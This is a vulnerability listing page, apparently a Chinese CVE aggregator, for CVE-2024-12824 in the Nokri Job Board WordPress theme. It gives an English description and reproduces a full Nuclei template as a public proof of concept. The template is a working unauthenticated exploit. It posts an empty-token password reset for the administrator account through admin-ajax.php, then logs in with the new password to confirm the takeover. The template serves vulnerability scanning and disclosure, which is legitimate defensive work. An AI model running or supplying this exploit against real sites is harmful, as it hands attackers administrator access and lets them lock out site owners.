CVE-2024-12824: Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change

日期: 2025-08-01 | 影响软件: Nokri - Job Board WordPress Theme | POC: 已公开

漏洞描述

The Nokri – Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is due to the plugin not properly checking for an empty token value prior updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and leverage that to gain access to their account.

PoC代码[已公开]

id: CVE-2024-12824

info:
  name: Nokri – Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Nokri – Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is due to the plugin not properly checking for an empty token value prior updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and leverage that to gain access to their account.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/nokri-2/nokri-job-board-wordpress-theme-162-unauthenticated-arbitrary-password-change
    - https://themeforest.net/item/nokri-job-board-wordpress-theme/22677241
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/60a7cce0-637f-49bd-aa4a-fd7023d99a64?source=cve
    - https://github.com/20142995/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-12824
    cwe-id: CWE-620
    epss-score: 0.52505
    epss-percentile: 0.97859
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2024,intrusive,nokri,unauth

flow: http(1) && http(2)

variables:
  username: "admin"
  userid: 1
  password: "{{randstr}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=sb_reset_password&sb_data=token%3d-sb-uid-1%26sb_new_password={{password}}&

    matchers:
      - type: word
        part: body
        words:
          - 1|Password Changed successfully.
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        log={{username}}&pwd={{password}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

      - type: status
        status:
          - 302
# digest: 490a00463044022007c1512fb4d05a8bb02a13d40d87f7b8319efa5348ed8b8425194cf15687951202203686bc814415ae957cd59677169489f6790e3a4c1a5168326bd60979602b5732:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-12824.yaml